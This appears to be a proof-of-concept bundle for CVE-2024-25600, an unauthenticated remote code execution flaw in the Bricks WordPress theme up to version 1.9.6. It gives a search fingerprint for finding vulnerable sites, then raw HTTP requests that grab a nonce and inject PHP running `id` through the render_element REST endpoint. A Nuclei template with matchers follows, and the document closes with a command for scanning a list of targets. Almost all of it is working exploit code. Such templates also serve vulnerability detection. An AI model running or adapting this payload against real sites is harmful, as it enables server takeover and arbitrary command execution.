CVE-2024-25600

body="/wp-content/themes/bricks/"

GET / HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeAccept-Encoding: gzip

POST /wp-json/bricks/v1/render_element HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeContent-Length: 356Content-Type: application/jsonAccept-Encoding: gzip{  "postId": "1",  "nonce": "第一步获得的值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",        "objectType": "post"      }    }  }}

id: CVE-2024-25600info:  name: Unauthenticated Remote Code Execution – Bricks <= 1.9.6  author: christbowel  severity: critical  description: |    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities  reference:    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6    - https://github.com/Chocapikk/CVE-2024-25600    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation  metadata:    publicwww-query: "/wp-content/themes/bricks/"    verified: true    max-request: 2  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rcehttp:  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}      - |        POST /wp-json/bricks/v1/render_element HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {          "postId": "1",          "nonce": "{{nonce}}",          "element": {            "name": "container",            "settings": {              "hasLoop": "true",              "query": {                "useQueryEditor": true,                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",                "objectType": "post"              }            }          }        }    matchers-condition: and    matchers:      - type: regex        part: body        regex:          - "Exception:"          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"        condition: and    extractors:      - type: regex        name: nonce        part: body        group: 1        regex:          - 'nonce":"([0-9a-z]+)'        internal: true# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950

nuclei.exe -l data/CVE-2024-25600.txt -t mypoc/cve/CVE-2024-25600.yaml